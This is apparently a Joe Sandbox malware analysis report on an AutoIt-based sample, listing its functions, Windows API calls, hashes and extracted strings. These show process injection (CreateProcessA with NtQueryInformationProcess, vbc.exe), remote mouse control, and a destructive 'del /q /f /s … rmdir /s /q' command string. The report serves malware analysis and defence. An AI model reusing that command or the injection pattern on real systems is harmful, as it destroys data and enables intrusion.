Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 046FDE90
Part of subcall function 046FDD68: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 046FDEA2

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000,?,?,047247C0,00000000,0472489E,?,?,?,?,?,0470ACDD,00000000,0470B1B3), ref: 046FDFF5

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
String ID:
API String ID: 2242398760-0
Opcode ID: 2ab9d1cc8fa178b427d91a979350607f94cd52469ac7aa082c3acd81bed39b06
Instruction ID: 0bcd656c6a958e2ac0cc74c182caeef92e38e8283b9d445bfc6b3bd51076c6eb
Opcode Fuzzy Hash: 2ab9d1cc8fa178b427d91a979350607f94cd52469ac7aa082c3acd81bed39b06
Instruction Fuzzy Hash: 64C08062202220175B1066F42C84CC7574DCD450B730404A3B746D3101F6655C00D2D0

Function 04721D48 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,04721D92,00000000,04721DAA,?,?,?,?,04721E0C,00000000,04721E24,?,?), ref: 04721D53

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e597e99b544f78c8369dee7521431802b7358ebfaa5c245ce0a311468ee328c1
Instruction ID: 83fc56f426b163bb5755884e4b1753e1496932d3b99f0e35f721dbd0e671d5bc
Opcode Fuzzy Hash: e597e99b544f78c8369dee7521431802b7358ebfaa5c245ce0a311468ee328c1
Instruction Fuzzy Hash: 64C08CA1202640066B2061FC2EC610B1288D9942383A40B3AA2B9C27D3E622F0532010

Function 00C542AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00C906E6,00000000,00000000,00000000), ref: 00C542BF

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 22022eb479b1cc6cf88a6cf33b89204121d5e883db48ebf6cee687fea7024d72
Instruction ID: 007aaa860bb6ff493c6e81ae35a698e27466a2d55a788efe7d4502346f7184e8
Opcode Fuzzy Hash: 22022eb479b1cc6cf88a6cf33b89204121d5e883db48ebf6cee687fea7024d72
Instruction Fuzzy Hash: 5ED0C77464020CBFEB10CB84DC46FAD777CE705710F200195FD0466290D6B27D508795

Function 00C413C7 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C413C8

Part of subcall function 00C429E2: GetWindowLongW.USER32(?,000000EB), ref: 00C429F3

Part of subcall function 00C42714: GetCursorPos.USER32(?), ref: 00C42727
Part of subcall function 00C42714: ScreenToClient.USER32(00D077B0,?), ref: 00C42744
Part of subcall function 00C42714: GetAsyncKeyState.USER32(00000001), ref: 00C42769
Part of subcall function 00C42714: GetAsyncKeyState.USER32(00000002), ref: 00C42777

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: AsyncStateWindow$ClientCursorForegroundLongScreen
String ID:
API String ID: 4074248120-0
Opcode ID: 2cc671f1ec4028e087f490988ae0fd9da4a997227c6847b04f389fce21c18f86
Instruction ID: c7df3887a95f77b50720f3cc141994e38c8581e14cb43cd7efeb923fb85be7bb
Opcode Fuzzy Hash: 2cc671f1ec4028e087f490988ae0fd9da4a997227c6847b04f389fce21c18f86
Instruction Fuzzy Hash: BED05E306010104BC518AB1CDC4AB5E3755BB45320B184611F4298F3E1CA212D92DAA1

Function 00C6547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00C65486

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 92a6f83cdf8641065f21b90602f5e31acad009eccd2317569e1538f29bbd4b05
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 4AB092B644020C77CE112A82EC03A693B299B40668F408060FB0C1C162AA73A6A0A689

Function 0470C992 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,04752924), ref: 0470C9A7

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 152ec78d0e38549df7952d50f2f9c9298198c0be456325a2a09459be0d1c390d
Instruction ID: def752a28898c0297185e89584d40f4e883ba21cf546534707cdf1c540ba0945
Opcode Fuzzy Hash: 152ec78d0e38549df7952d50f2f9c9298198c0be456325a2a09459be0d1c390d
Instruction Fuzzy Hash: CFB01270362300AFDB1E6F34590946037C8B74070C7C48680B440AC3C3C1CBA8404D87

Function 04720F50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 04720F54

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 8ca04f347eb431742ccdc2cca529484793f697e5c1c0306d529102c795d49969
Instruction ID: e86869658d0dca64583011c7ae63f24efca5ed671619d87214f2c96648d46a5d
Opcode Fuzzy Hash: 8ca04f347eb431742ccdc2cca529484793f697e5c1c0306d529102c795d49969
Instruction Fuzzy Hash: 5FA012108084010AC804A7188D4240F31C059C1014FC4021464DCA5781F605956503DB

Function 00CAD6BE Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00CAD842

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: bf3e99d6e652147004741d8fe0a4dfc66f4490219688689bff5dffae78d56911
Instruction ID: 20d70ea24e19b7b81b4dab54e193800a50fd09aa587eb159cc61d50ddbe1901c
Opcode Fuzzy Hash: bf3e99d6e652147004741d8fe0a4dfc66f4490219688689bff5dffae78d56911
Instruction Fuzzy Hash: B37191342043028FC714EF64C495A6EB7E0BF89358F04462DF897976A2DB34EE49DB92

Function 01798B5D Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 01798BF6

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c76aefefe328582bb8f4a659beadaed505253ffd2a8cad07ce4359c1333d8f85
Instruction ID: 58921d7d0d834ff3b68a1d22b47e057d775f82ab33f2301a4f58d9a89dbdb278
Opcode Fuzzy Hash: c76aefefe328582bb8f4a659beadaed505253ffd2a8cad07ce4359c1333d8f85
Instruction Fuzzy Hash: EF21CEB560524A9FCB50CF2CD880A5AB7F0FF8A350F148969F999CB345E330E9588B56

Function 046F176C Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 046F1805

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f35aed9765d3e8aa02d8d63bd4f40c00797e976e6fde247dd20996fb02f99996
Instruction ID: fe8d648886a7b8e6f3982be54cfd9c73a5c2d2bf6ad254735c4d48af97c82624
Opcode Fuzzy Hash: f35aed9765d3e8aa02d8d63bd4f40c00797e976e6fde247dd20996fb02f99996
Instruction Fuzzy Hash: 9C21CEB5604246DFC750CF28C880A9AB7E4FF99390F108969FAE8DB344E330E944CB52

Function 01798C1D Relevance: 1.3, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000), ref: 01798CAD

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 7d8bba7ef7d82a0d1a231bda6a1abb9a1752f3b1a8eb8e8dbf14ccf3ae21db12
Instruction ID: 8042ddb214a1fd4b6b7687afa9d0b4e233faff496ae59539307d2923ca739580
Opcode Fuzzy Hash: 7d8bba7ef7d82a0d1a231bda6a1abb9a1752f3b1a8eb8e8dbf14ccf3ae21db12
Instruction Fuzzy Hash: C421C2B5205346CFCB50CF2CD980A1AF7E0FF8A350B2449A9E594DB355E331E919CB56

Function 0472478C Relevance: 1.3, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 046FDFE4: CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000,?,?,047247C0,00000000,0472489E,?,?,?,?,?,0470ACDD,00000000,0470B1B3), ref: 046FDFF5

Part of subcall function 046FE004: Process32First.KERNEL32(?,00000128), ref: 046FE015

CloseHandle.KERNEL32(?,04724872), ref: 04724865

Part of subcall function 046FE024: Process32Next.KERNEL32(?,00000128), ref: 046FE035

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: c4fbf45a694d7a580b634ad7cc577d44f0b4ed0c94d55b83a67599402d271742
Instruction ID: ce041b01d21c01a9578997e0d01991a92429ac468501bfed8518977650973dfc
Opcode Fuzzy Hash: c4fbf45a694d7a580b634ad7cc577d44f0b4ed0c94d55b83a67599402d271742
Instruction Fuzzy Hash: 1921AF70A10758AFEB11DF61CD50ADABBF9EB89704F4184B9E904A2B10FB347B51DE14

Function 046F182C Relevance: 1.3, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000), ref: 046F18BC

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: a8a7db8260c75bc8401b9aaff5db9df9de31f99107765f4a123f954c3df657b9
Instruction ID: b2c016b125feb246d5780bd67ce7b1c7d9ec89e7b858e96709e7150bda7c2325
Opcode Fuzzy Hash: a8a7db8260c75bc8401b9aaff5db9df9de31f99107765f4a123f954c3df657b9
Instruction Fuzzy Hash: 0B21E0B5604306DFC750CF28D980A5AB7E4FF89350B6049A9EAE4DB354E331E909CF52

Function 0472429C Relevance: 1.3, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 047241CC: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,04724268,?,00000000,04724288,?,?,?,?), ref: 0472421B
Part of subcall function 047241CC: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,04724268,?,00000000,04724288), ref: 0472422A
Part of subcall function 047241CC: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,04724268), ref: 0472423D
Part of subcall function 047241CC: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003), ref: 04724253
Part of subcall function 047241CC: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000), ref: 04724259

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,04724310,?,00000000,04724330,?,?,?,?), ref: 04724301

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: 26b833d7d9cc5bf62f3c8562b9353c7e49b6005b8262052272853ab7a94fb031
Instruction ID: afc0b82102e2d83c57734c541e2b8c6c6d9d4fd8dc597071d610e9ecbe26d5d2
Opcode Fuzzy Hash: 26b833d7d9cc5bf62f3c8562b9353c7e49b6005b8262052272853ab7a94fb031
Instruction Fuzzy Hash: 5A01C030B04714AFE711DFA5DD51A9EB7B8EB49714F5184B8E500A3B50EA347E10DE14

Function 04724B28 Relevance: 1.3, APIs: 1, Instructions: 39sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 04724A94: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04724B18,?,?,?,00000001), ref: 04724AD9
Part of subcall function 04724A94: WriteFile.KERNEL32(00000000,?,00000000,04724B99,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04724B18), ref: 04724AF1
Part of subcall function 04724A94: CloseHandle.KERNEL32(00000000,00000000,?,00000000,04724B99,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04724B18), ref: 04724AFD

Sleep.KERNEL32(00000002,00000000,04724B99,?,00000001), ref: 04724B79

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSleepWrite
String ID:
API String ID: 1443029356-0
Opcode ID: c6b12ac22ce57a22bcf4f3755e44ebf2b0170522c8bd902efa483b92a8ea7e9c
Instruction ID: e117fef3a083a137eacd991d77929f5dbae52e0dd7460935d898a3945a0ded59
Opcode Fuzzy Hash: c6b12ac22ce57a22bcf4f3755e44ebf2b0170522c8bd902efa483b92a8ea7e9c
Instruction Fuzzy Hash: BCF0A470A04248AFEB15EFA8CD41A9EB7F8EF48704F9040B99104D3B50EF30BE40CA18

Function 0471DEFC Relevance: 1.3, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 04721D00: CreateFileA.KERNEL32(00000000,40000000,00000002,04721EBC,?,?,?,?,00000000,00000000,?,04721E80,00000000,00000000,00000002,00000000), ref: 04721D30

CloseHandle.KERNEL32(FFFFFFFF,00000000,00000000,00000002,00000000,?,0474E61D,00000064,00000000,00000000,0474E7E6,?,00000014,00000000,00000000), ref: 0471DF35

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: b94fbee17c00092945446451b93396e8c6df87854d352970b43492a563c3564f
Instruction ID: 4e7f95209559a25f6ee364001d92eed3146cbf9a4a1b637e0b0df409e81688b2
Opcode Fuzzy Hash: b94fbee17c00092945446451b93396e8c6df87854d352970b43492a563c3564f
Instruction Fuzzy Hash: 3BE08C71344300AAF320AAB8AC89B87339CE304318F6481B9F2218F2D1D5E5BC014BC4

Function 04721470 Relevance: 1.3, APIs: 1, Instructions: 3sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000002,04721F25,00000000,04721F40), ref: 04721471

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ed8bd73b883f2d36834accb1a818f950ca40a5e38274400c793f1c275f9fba89
Instruction ID: 8ae42f7c563f814fe455ff5679a2471cf528b45ee26ce16970291814f76210a8
Opcode Fuzzy Hash: ed8bd73b883f2d36834accb1a818f950ca40a5e38274400c793f1c275f9fba89
Instruction Fuzzy Hash:

Function 017A8589 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2390371860.00000000017A6000.00000040.00000020.00020000.00000000.sdmp, Offset: 017A6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_17a6000_Autoit3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
Instruction ID: e4fafa14dfc5eff366f43f22e13562488ba970c870da8b7cfa86633abfbfe378
Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
Instruction Fuzzy Hash: 27310771104602AAFF218AACCC44BA6FB78BFC1366F900365F6959B0C3D730A554C7A7

Function 0179AE3D Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb0a48abcbe50443eabbf998e0f43abb0b5cb66ca5c2447820ec0e303b75863
Instruction ID: 320c966f6f96a3732fd4bdb5a8d54513038ffe8ce2313182606b0d68224f4e53
Opcode Fuzzy Hash: 3eb0a48abcbe50443eabbf998e0f43abb0b5cb66ca5c2447820ec0e303b75863
Instruction Fuzzy Hash: AB01A432A09604DFDB108F9DE881859FBE8FB4D320B6681BAE518D3650E731AD54CA54

Function 0179FF2D Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 7adc492d8fb6b509d53b604d96576f32860961ee5bfcd8067f2c24a68c221d86
Instruction ID: 9d34e60ceaeafc4c983cee4a5adec089112b20e9f10e91d6ea84329e21c38d5e
Opcode Fuzzy Hash: 7adc492d8fb6b509d53b604d96576f32860961ee5bfcd8067f2c24a68c221d86
Instruction Fuzzy Hash: 57F09070A04208AFCF00EFA9E85588DFBB9EB4D610F5085B4E410E3654E7305E08CA40

Function 0179AEAD Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7938f7f03d0690ebee1c5fa10dfe9c86287a1f2d451cbce0eda5f333a1884952
Instruction ID: 61efb9bbd4561d8af339bb61078bbe1051b9c34e9b6776070efc7b555198e6cf
Opcode Fuzzy Hash: 7938f7f03d0690ebee1c5fa10dfe9c86287a1f2d451cbce0eda5f333a1884952
Instruction Fuzzy Hash: 30E017B08093008FCB64EF28B119201BFF1B78C324BD0C5A9C4498B25FF73480088F51

Function 01797592 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9831eed8d6eda24d68a497421f123d12ba3802675b8b2256879e16f8b4b7be92
Instruction ID: 5dfb65ec4211b1504d7b11591425dfe1f46e7cd184c929c4230eb467ff0a2a64
Opcode Fuzzy Hash: 9831eed8d6eda24d68a497421f123d12ba3802675b8b2256879e16f8b4b7be92
Instruction Fuzzy Hash: 539004D5455043114D4555F4CD157C5054CC7DC1D7F150551F134D014CDDCCC1C110F1

Non-executed Functions

Function 0474C828 Relevance: 55.5, APIs: 13, Strings: 18, Instructions: 1230threadsleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0474C9A2

Part of subcall function 0471794C: Sleep.KERNEL32(00000064,00000000,04717A31,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 047179FE

Sleep.KERNEL32(00000000,00000000,00000000,|||,04752E8C,0474DBE8,?,0474DBE8,?,0474DBE8,?,0474DBE8,?,00000001,00000000,00000000), ref: 0474CABF
GetTickCount.KERNEL32 ref: 0474CAC9
TerminateThread.KERNEL32(00000000,00000000,00000000,?,|||,04752E8C,0474DBE8,?,0474DBE8,?,0474DBE8,?,0474DBE8,?,00000000,0474DBCF), ref: 0474CB40
TerminateThread.KERNEL32(00000000,00000000,00000000,?,|||,04752E8C,0474DBE8,?,0474DBE8,?,0474DBE8,?,0474DBE8,?,00000000,0474DBCF), ref: 0474CB82
Sleep.KERNEL32(00000BB8,00000001,00000000,.a3x,?,04752E50,00000000,?,|||,04752E8C,0474DBE8,?,0474DBE8,?,0474DBE8,?), ref: 0474CE37

Part of subcall function 0471B2A4: GetCurrentProcessId.KERNEL32(?,00000000,0471B4F8,?,00000000), ref: 0471B31A
Part of subcall function 0471B2A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0471B4F8,?,00000000), ref: 0471B3E7
Part of subcall function 0471B2A4: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 0471B3FF

TerminateThread.KERNEL32(00000000,00000000,00000000,?,|||,04752E8C,0474DBE8,?,0474DBE8,?,0474DBE8,?,0474DBE8,?,00000000,0474DBCF), ref: 0474D322
TerminateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,|||,04752E8C,0474DBE8,?,0474DBE8,?,0474DBE8,?,0474DBE8,?), ref: 0474D331
TerminateProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,|||,04752E8C,0474DBE8,?,0474DBE8,?,0474DBE8,?), ref: 0474D340
SetCursorPos.USER32(00000000,00000000,00000000,?,|||,04752E8C,0474DBE8,?,0474DBE8,?,0474DBE8,?,0474DBE8,?,00000000,0474DBCF), ref: 0474D5B6
SetCursorPos.USER32(00000000,00000000,00000000,?,|||,04752E8C,0474DBE8,?,0474DBE8,?,0474DBE8,?,0474DBE8,?,00000000,0474DBCF), ref: 0474D55D

Part of subcall function 0474136C: mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 04741376
Part of subcall function 0474136C: mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 04741385

Sleep.KERNEL32(00000064,00000000,00000000,00000000,?,|||,04752E8C,0474DBE8,?,0474DBE8,?,0474DBE8,?,0474DBE8,?,00000000), ref: 0474D5C2
SetCursorPos.USER32(00000000,00000000,00000000,?,|||,04752E8C,0474DBE8,?,0474DBE8,?,0474DBE8,?,0474DBE8,?,00000000,0474DBCF), ref: 0474D61B

Part of subcall function 0470BFD0: SHFileOperationW.SHELL32(?,00000000,0470C049), ref: 0470C029

Strings

C:\*, xrefs: 0474DA51
NOTIFICATIONS, xrefs: 0474D4CF
script.au3, xrefs: 0474CE08
/c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s , xrefs: 0474D0C7
au3, xrefs: 0474CDDA
dark, xrefs: 0474CB18
.a3x, xrefs: 0474CDE7
cmd.exe, xrefs: 0474D0EF, 0474D36F
powershell.exe, xrefs: 0474D3B9
vbc.exe, xrefs: 0474D0A0
test msg, xrefs: 0474D7C5
||-_-|-_-||, xrefs: 0474CE70, 0474CE82, 0474D10A, 0474D166, 0474D196, 0474D1DF, 0474D20B, 0474D281, 0474D43D, 0474D635, 0474D64A, 0474D967, 0474DA46, 0474DA61, 0474DA77, 0474DA8D, 0474DAA3, 0474DAB9, 0474DACF, 0474DB01, 0474DB16
& rmdir /s /q , xrefs: 0474D0D3
Autoit3.exe, xrefs: 0474CDA4, 0474CDBD
DOMAINS, xrefs: 0474D4AA
u.txt, xrefs: 0474CD86
|||, xrefs: 0474C9DB
Yes, xrefs: 0474CD5A, 0474D04B

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Terminate$ProcessSleepThread$Cursor$CountTickmouse_event$CreateCurrentFileInformationOperationQuery
String ID: & rmdir /s /q $.a3x$/c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s $Autoit3.exe$C:\*$DOMAINS$NOTIFICATIONS$Yes$au3$cmd.exe$dark$powershell.exe$script.au3$test msg$u.txt$vbc.exe$||-_-|-_-||$|||
API String ID: 2524358176-1342930026
Opcode ID: 3676ab9ad1d6e9de47c719f08f51c07c6389f0e1ae3c77bfd215d33d97b63693
Instruction ID: 52673a488b81bbf0e37fa3327c72fe1ddaa0c3aae6a75f7e3299419e96bacb10
